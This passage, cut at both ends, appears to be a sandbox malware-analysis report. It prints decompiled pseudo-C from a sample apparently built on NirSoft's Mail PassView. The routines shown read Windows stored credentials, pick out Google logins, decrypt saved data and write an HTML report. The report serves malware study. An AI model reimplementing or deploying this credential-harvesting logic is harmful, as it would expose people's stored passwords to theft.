                                                              							_v4104 = 0;
                                                              							memset( &_v4103, 0, 0x1000);
                                                              							GetWindowTextA(_t43,  &_v4104, 0x1000);
                                                              							__eflags = _v4104;
                                                              							if(__eflags != 0) {
                                                              								E00407E55(__eflags, "caption",  &_v4104);
                                                              							}
                                                              							EnumChildWindows(_t43, E00407FEB, 0);
                                                              							DestroyWindow(_t43);
                                                              						} else {
                                                              							while(1) {
                                                              								_t30 =  *_t39;
                                                              								__eflags = _t30;
                                                              								if(_t30 == 0) {
                                                              									goto L8;
                                                              								}
                                                              								__eflags = _t30 - _a12;
                                                              								if(_t30 != _a12) {
                                                              									_t39 = _t39 + 4;
                                                              									__eflags = _t39;
                                                              									continue;
                                                              								}
                                                              								goto L11;
                                                              							}
                                                              							goto L8;
                                                              						}
                                                              						L11:
                                                              					}
                                                              				} else {
                                                              					sprintf(0x4172c0, "menu_%d", _a12);
                                                              					_t32 = LoadMenuA(_a4, _a12);
                                                              					 *0x4171b4 =  *0x4171b4 & 0x00000000;
                                                              					_t48 = _t32;
                                                              					_push(1);
                                                              					_push(_t48);
                                                              					_push(_a12);
                                                              					E00407EFB(_t38, _t55);
                                                              					DestroyMenu(_t48);
                                                              				}
                                                              				return 1;
                                                              			}











                                                              0x004080a3
                                                              0x004080a3
                                                              0x004080ab
                                                              0x004080b0
                                                              0x004080b5
                                                              0x004080fb
                                                              0x004080ff
                                                              0x00408105
                                                              0x0040810e
                                                              0x00408110
                                                              0x00408126
                                                              0x00408126
                                                              0x00408134
                                                              0x00408155
                                                              0x0040815f
                                                              0x00408165
                                                              0x00408176
                                                              0x0040817c
                                                              0x00408182
                                                              0x00408190
                                                              0x00408196
                                                              0x0040819e
                                                              0x004081a5
                                                              0x00408112
                                                              0x00408120
                                                              0x00408120
                                                              0x00408122
                                                              0x00408124
                                                              0x00000000
                                                              0x00000000
                                                              0x00408114
                                                              0x00408117
                                                              0x0040811d
                                                              0x0040811d
                                                              0x00000000
                                                              0x0040811d
                                                              0x00000000
                                                              0x00408117
                                                              0x00000000
                                                              0x00408120
                                                              0x004081ac
                                                              0x004081ac
                                                              0x004080b7
                                                              0x004080c4
                                                              0x004080d2
                                                              0x004080d8
                                                              0x004080df
                                                              0x004080e1
                                                              0x004080e3
                                                              0x004080e4
                                                              0x004080e7
                                                              0x004080f0
                                                              0x004080f0
                                                              0x004081b2

                                                              APIs
                                                              • sprintf.MSVCRT ref: 004080C4
                                                              • LoadMenuA.USER32 ref: 004080D2
                                                                • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                              • DestroyMenu.USER32(00000000), ref: 004080F0
                                                              • sprintf.MSVCRT ref: 00408134
                                                              • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                              • memset.MSVCRT ref: 00408165
                                                              • GetWindowTextA.USER32 ref: 00408176
                                                              • EnumChildWindows.USER32 ref: 0040819E
                                                              • DestroyWindow.USER32(00000000), ref: 004081A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                              • String ID: caption$dialog_%d$menu_%d
                                                              • API String ID: 3259144588-3822380221
                                                              • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                              • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                              • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                              • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040E056() {
                                                              				void* _t1;
                                                              				_Unknown_base(*)()* _t2;
                                                              				struct HINSTANCE__* _t4;
                                                              
                                                              				if( *0x417514 != 0) {
                                                              					return _t1;
                                                              				}
                                                              				_t2 = GetModuleHandleA("kernel32.dll");
                                                              				_t4 = _t2;
                                                              				if(_t4 == 0) {
                                                              					L9:
                                                              					return _t2;
                                                              				}
                                                              				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                              				 *0x416fe0 = _t2;
                                                              				if(_t2 != 0) {
                                                              					_t2 = GetProcAddress(_t4, "Module32First");
                                                              					 *0x416fd8 = _t2;
                                                              					if(_t2 != 0) {
                                                              						_t2 = GetProcAddress(_t4, "Module32Next");
                                                              						 *0x416fd4 = _t2;
                                                              						if(_t2 != 0) {
                                                              							_t2 = GetProcAddress(_t4, "Process32First");
                                                              							 *0x416e6c = _t2;
                                                              							if(_t2 != 0) {
                                                              								_t2 = GetProcAddress(_t4, "Process32Next");
                                                              								 *0x416fcc = _t2;
                                                              								if(_t2 != 0) {
                                                              									 *0x417514 = 1;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				goto L9;
                                                              			}






                                                              0x0040e05d
                                                              0x0040e0d9
                                                              0x0040e0d9
                                                              0x0040e065
                                                              0x0040e06b
                                                              0x0040e06f
                                                              0x0040e0d8
                                                              0x00000000
                                                              0x0040e0d8
                                                              0x0040e07e
                                                              0x0040e082
                                                              0x0040e087
                                                              0x0040e08f
                                                              0x0040e093
                                                              0x0040e098
                                                              0x0040e0a0
                                                              0x0040e0a4
                                                              0x0040e0a9
                                                              0x0040e0b1
                                                              0x0040e0b5
                                                              0x0040e0ba
                                                              0x0040e0c2
                                                              0x0040e0c6
                                                              0x0040e0cb
                                                              0x0040e0cd
                                                              0x0040e0cd
                                                              0x0040e0cb
                                                              0x0040e0ba
                                                              0x0040e0a9
                                                              0x0040e098
                                                              0x00000000

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                              • API String ID: 667068680-3953557276
                                                              • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                              • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                              • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                              • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
                                                              				void* __esi;
                                                              				struct HINSTANCE__* _t12;
                                                              				struct HINSTANCE__** _t23;
                                                              
                                                              				_t23 = __eax;
                                                              				E004046C2(__eax);
                                                              				_t12 = LoadLibraryA("advapi32.dll");
                                                              				 *_t23 = _t12;
                                                              				if(_t12 != 0) {
                                                              					_t23[2] = GetProcAddress(_t12, "CredReadA");
                                                              					_t23[3] = GetProcAddress( *_t23, "CredFree");
                                                              					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
                                                              					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
                                                              					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
                                                              					if(_t23[2] == 0 || _t23[3] == 0) {
                                                              						E004046C2(_t23);
                                                              					} else {
                                                              						_t23[1] = 1;
                                                              					}
                                                              				}
                                                              				return _t23[1];
                                                              			}






                                                              0x00404648
                                                              0x0040464a
                                                              0x00404654
                                                              0x0040465c
                                                              0x0040465e
                                                              0x00404676
                                                              0x00404682
                                                              0x0040468e
                                                              0x0040469a
                                                              0x004046a3
                                                              0x004046a7
                                                              0x004046b8
                                                              0x004046af
                                                              0x004046af
                                                              0x004046af
                                                              0x004046a7
                                                              0x004046c1

                                                              APIs
                                                                • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,75D6F420), ref: 004046C9
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                              • API String ID: 2449869053-4258758744
                                                              • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                              • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                              • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                              • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
                                                              				void _v8;
                                                              				void _v12;
                                                              				void _v24;
                                                              				char _v39;
                                                              				void _v40;
                                                              				char _v132;
                                                              				void _v1156;
                                                              				void _v1172;
                                                              				char _v1180;
                                                              				void _v1187;
                                                              				char _v1188;
                                                              				void _v2228;
                                                              				void _v2243;
                                                              				void _v2244;
                                                              				void _v3267;
                                                              				char _v3268;
                                                              				void _v4291;
                                                              				char _v4292;
                                                              				char _v5340;
                                                              				void _v5347;
                                                              				char _v5348;
                                                              				char _v6116;
                                                              				char _v7136;
                                                              				void _v7140;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				int _t86;
                                                              				void* _t109;
                                                              				void* _t122;
                                                              				void* _t135;
                                                              				char _t156;
                                                              				signed char _t168;
                                                              				signed int _t171;
                                                              				intOrPtr _t177;
                                                              				signed int _t183;
                                                              				void* _t185;
                                                              
                                                              				_t171 = __edx;
                                                              				E004118A0(0x1be4, __ecx);
                                                              				_t156 = 0;
                                                              				_v3268 = 0;
                                                              				memset( &_v3267, 0, 0x3ff);
                                                              				_a8 = E00410E8A(_a8,  &_v3268);
                                                              				_t86 = strlen(_a4);
                                                              				_v8 = _t86;
                                                              				if(_a8 > 4) {
                                                              					_t193 = _t86;
                                                              					if(_t86 > 0) {
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsb");
                                                              						_v2244 = 0;
                                                              						memset( &_v2243, 0, 0x41e);
                                                              						_v1188 = 0;
                                                              						memset( &_v1187, 0, 0x41e);
                                                              						_v5348 = 0;
                                                              						memset( &_v5347, 0, 0x41e);
                                                              						_v40 = 0;
                                                              						asm("stosd");
                                                              						asm("stosd");
                                                              						asm("stosd");
                                                              						asm("stosw");
                                                              						asm("stosb");
                                                              						_v4292 = 0;
                                                              						memset( &_v4291, 0, 0x3ff);
                                                              						E0040BC49( &_v132);
                                                              						E0040BC6D(_v8,  &_v132, _a4);
                                                              						_t181 =  &_v132;
                                                              						E0040BD0B( &_v39,  &_v132,  &_v2244);
                                                              						memcpy( &_v2228,  &_v24, 8);
                                                              						E0040BC49( &_v132);
                                                              						_push( &_v2244);
                                                              						_t109 = 0x18;
                                                              						E0040BC6D(_t109,  &_v132);
                                                              						E0040BD0B( &_v39, _t181,  &_v1188);
                                                              						memcpy( &_v1172,  &_v2244, 0x10);
                                                              						memcpy( &_v1156,  &_v24, 8);
                                                              						E0040BC49(_t181);
                                                              						_push( &_v1188);
                                                              						_t122 = 0x28;
                                                              						E0040BC6D(_t122, _t181);
                                                              						E0040BD0B( &_v39, _t181,  &_v5348);
                                                              						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
                                                              						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
                                                              						_t177 = _a8;
                                                              						asm("cdq");
                                                              						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
                                                              						_a4 = 0;
                                                              						if(_t183 > 0) {
                                                              							do {
                                                              								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
                                                              								_a4 =  &(_a4[1]);
                                                              							} while (_a4 < _t183);
                                                              							_t177 = _a8;
                                                              						}
                                                              						_t135 = 0;
                                                              						if(_t177 > _t156) {
                                                              							do {
                                                              								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
                                                              								_t135 = _t135 + 1;
                                                              								 *(_t185 + _t135 - 0x1be1) = _t168;
                                                              							} while (_t135 < _t177);
                                                              						}
                                                              						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
                                                              						strcpy(_a12,  &_v7136);
                                                              						E0040BC49( &_v132);
                                                              						_t67 = _t177 - 4; // 0x0
                                                              						E0040BC6D(_t67,  &_v132, _a12);
                                                              						E0040BD0B(_t177,  &_v132,  &_v40);
                                                              						memcpy( &_v8,  &_v40, 4);
                                                              						memcpy( &_v12,  &_v7140, 4);
                                                              						_t156 = 1;
                                                              						 *_a16 = 0 | _v8 == _v12;
                                                              					}
                                                              				}
                                                              				return _t156;
                                                              			}







































                                                              0x00411015
                                                              0x0041101d
                                                              0x00411025
                                                              0x00411034
                                                              0x0041103a
                                                              0x00411053
                                                              0x00411056
                                                              0x00411060
                                                              0x00411063
                                                              0x00411069
                                                              0x0041106b
                                                              0x00411079
                                                              0x0041107a
                                                              0x0041107b
                                                              0x0041108a
                                                              0x00411090
                                                              0x0041109e
                                                              0x004110a4
                                                              0x004110b2
                                                              0x004110b8
                                                              0x004110bf
                                                              0x004110c5
                                                              0x004110c6
                                                              0x004110c7
                                                              0x004110c8
                                                              0x004110cf
                                                              0x004110d8
                                                              0x004110de
                                                              0x004110e6
                                                              0x004110f4
                                                              0x00411100
                                                              0x00411103
                                                              0x00411115
                                                              0x0041111f
                                                              0x0041112a
                                                              0x0041112d
                                                              0x00411130
                                                              0x0041113c
                                                              0x00411151
                                                              0x00411163
                                                              0x0041116a
                                                              0x00411175
                                                              0x00411178
                                                              0x0041117b
                                                              0x00411187
                                                              0x004111a6
                                                              0x004111be
                                                              0x004111c3
                                                              0x004111c8
                                                              0x004111d0
                                                              0x004111d8
                                                              0x004111db
                                                              0x004111dd
                                                              0x004111f8
                                                              0x004111fd
                                                              0x00411203
                                                              0x00411206
                                                              0x00411206
                                                              0x00411209
                                                              0x0041120d
                                                              0x0041120f
                                                              0x00411216
                                                              0x0041121d
                                                              0x00411220
                                                              0x00411220
                                                              0x0041120f
                                                              0x00411233
                                                              0x0041123a
                                                              0x00411242
                                                              0x0041124a
                                                              0x00411250
                                                              0x0041125c
                                                              0x0041126b
                                                              0x0041127d
                                                              0x00411295
                                                              0x00411296
                                                              0x00411296
                                                              0x0041106b
                                                              0x0041129e

                                                              APIs
                                                              • memset.MSVCRT ref: 0041103A
                                                                • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                              • strlen.MSVCRT ref: 00411056
                                                              • memset.MSVCRT ref: 00411090
                                                              • memset.MSVCRT ref: 004110A4
                                                              • memset.MSVCRT ref: 004110B8
                                                              • memset.MSVCRT ref: 004110DE
                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                              • memcpy.MSVCRT ref: 00411115
                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                              • memcpy.MSVCRT ref: 00411151
                                                              • memcpy.MSVCRT ref: 00411163
                                                              • strcpy.MSVCRT(?,?), ref: 0041123A
                                                              • memcpy.MSVCRT ref: 0041126B
                                                              • memcpy.MSVCRT ref: 0041127D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$strcpy
                                                              • String ID: salu
                                                              • API String ID: 2660478486-4177317985
                                                              • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                              • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                              • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                              • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 81%
                                                              			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                              				intOrPtr* _v8;
                                                              				char _v76;
                                                              				void _v1099;
                                                              				char _v1100;
                                                              				void _v2123;
                                                              				char _v2124;
                                                              				void _v3147;
                                                              				char _v3148;
                                                              				char _v4172;
                                                              				void* __ebx;
                                                              				void* __esi;
                                                              				void* _t36;
                                                              				void* _t37;
                                                              				void* _t48;
                                                              				void* _t55;
                                                              				intOrPtr* _t56;
                                                              				signed int _t58;
                                                              				intOrPtr* _t63;
                                                              				void* _t70;
                                                              				void* _t71;
                                                              
                                                              				_t56 = __ecx;
                                                              				E004118A0(0x1048, __ecx);
                                                              				_t63 = _t56;
                                                              				_v8 = _t63;
                                                              				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                              				_v1100 = 0;
                                                              				memset( &_v1099, 0, 0x3ff);
                                                              				_v3148 = 0;
                                                              				memset( &_v3147, 0, 0x3ff);
                                                              				_v2124 = 0;
                                                              				memset( &_v2123, 0, 0x3ff);
                                                              				_t71 = _t70 + 0x2c;
                                                              				if( *0x417308 != 0) {
                                                              					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
                                                              					_t71 = _t71 + 0xc;
                                                              				}
                                                              				if( *0x417304 != 0) {
                                                              					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
                                                              				}
                                                              				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                                              				_t58 = 0x10;
                                                              				_push(_t36);
                                                              				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
                                                              				asm("movsb");
                                                              				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
                                                              				E00405EFD(_a4,  &_v4172);
                                                              				_push("Mail PassView");
                                                              				_t55 = 6;
                                                              				_push(E004078FF(_t55));
                                                              				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                              				_t48 = E00405EFD(_a4,  &_v2124);
                                                              				_t78 = _a8 - 4;
                                                              				if(_a8 == 4) {
                                                              					return E004097E6(_v8, _t78, _a4);
                                                              				}
                                                              				return _t48;
                                                              			}























                                                              0x00403e87
                                                              0x00403e8f
                                                              0x00403e9f
                                                              0x00403ea1
                                                              0x00403ea4
                                                              0x00403eb9
                                                              0x00403ebf
                                                              0x00403ecd
                                                              0x00403ed3
                                                              0x00403ee1
                                                              0x00403ee7
                                                              0x00403eec
                                                              0x00403ef5
                                                              0x00403f08
                                                              0x00403f0d
                                                              0x00403f0d
                                                              0x00403f16
                                                              0x00403f24
                                                              0x00403f2a
                                                              0x00403f2f
                                                              0x00403f34
                                                              0x00403f35
                                                              0x00403f3e
                                                              0x00403f5a
                                                              0x00403f5b
                                                              0x00403f6a
                                                              0x00403f72
                                                              0x00403f79
                                                              0x00403f7f
                                                              0x00403f8c
                                                              0x00403f9b
                                                              0x00403fa3
                                                              0x00403fa7
                                                              0x00000000
                                                              0x00403faf
                                                              0x00403fb8

                                                              APIs
                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                              • memset.MSVCRT ref: 00403EBF
                                                              • memset.MSVCRT ref: 00403ED3
                                                              • memset.MSVCRT ref: 00403EE7
                                                              • sprintf.MSVCRT ref: 00403F08
                                                              • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                              • sprintf.MSVCRT ref: 00403F5B
                                                              • sprintf.MSVCRT ref: 00403F8C
                                                              Strings
                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                              • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                              • Mail PassView, xrefs: 00403F72
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetsprintf$FileWritestrcpystrlen
                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                              • API String ID: 1043021993-495024357
                                                              • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                              • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                              • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                              • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
                                                              				intOrPtr _v8;
                                                              				char _v280;
                                                              				char _v408;
                                                              				intOrPtr _v412;
                                                              				char _v796;
                                                              				intOrPtr _v800;
                                                              				char _v928;
                                                              				char _v940;
                                                              				wchar_t* _t23;
                                                              				char* _t41;
                                                              				wchar_t** _t59;
                                                              				void* _t76;
                                                              
                                                              				_t76 = __fp0;
                                                              				_t59 = _a4;
                                                              				_t23 =  *_t59;
                                                              				_v8 = __ecx;
                                                              				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
                                                              					E004021D8( &_v940);
                                                              					_v800 = 7;
                                                              					_v412 = 3;
                                                              					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
                                                              					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
                                                              					strcpy( &_v928,  &_v408);
                                                              					strcpy( &_v796,  &_v408);
                                                              					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
                                                              						sprintf( &_v796, "%s@gmail.com",  &_v408);
                                                              					}
                                                              					_t41 = strchr( &_v928, 0x40);
                                                              					if(_t41 != 0) {
                                                              						 *_t41 = 0;
                                                              					}
                                                              					E00402407( &_v940, _t76, _v8 + 0xfffff788);
                                                              				}
                                                              				return 1;
                                                              			}















                                                              0x00404288
                                                              0x00404293
                                                              0x00404296
                                                              0x0040429c
                                                              0x0040429f
                                                              0x004042d3
                                                              0x004042ee
                                                              0x004042fa
                                                              0x00404304
                                                              0x00404318
                                                              0x00404328
                                                              0x0040433b
                                                              0x00404354
                                                              0x0040437e
                                                              0x00404383
                                                              0x0040438f
                                                              0x00404398
                                                              0x0040439a
                                                              0x0040439a
                                                              0x004043ab
                                                              0x004043ab
                                                              0x004043b6

                                                              APIs
                                                              • wcsstr.MSVCRT ref: 004042BD
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                              • strcpy.MSVCRT(?,?), ref: 00404328
                                                              • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                              • strchr.MSVCRT ref: 00404349
                                                              • strlen.MSVCRT ref: 0040435D
                                                              • sprintf.MSVCRT ref: 0040437E
                                                              • strchr.MSVCRT ref: 0040438F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                              • String ID: %s@gmail.com$www.google.com
                                                              • API String ID: 1359934567-4070641962
                                                              • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                              • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                              • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                              • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
                                                              				void _v4103;
                                                              				char _v4104;
                                                              				int _t21;
                                                              				int _t28;
                                                              				void* _t35;
                                                              
                                                              				_t35 = __eflags;
                                                              				E004118A0(0x1004, __ecx);
                                                              				strcpy(0x4171b8, _a8);
                                                              				strcpy(0x4172c0, "general");
                                                              				E00407E55(_t35, "TranslatorName", 0x412466);
                                                              				E00407E55(_t35, "TranslatorURL", 0x412466);
                                                              				EnumResourceNamesA(_a4, 4, E004080A3, 0);
                                                              				EnumResourceNamesA(_a4, 5, E004080A3, 0);
                                                              				strcpy(0x4172c0, "strings");
                                                              				_t28 = 0;
                                                              				_v4104 = 0;
                                                              				memset( &_v4103, 0, 0x1000);
                                                              				do {
                                                              					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
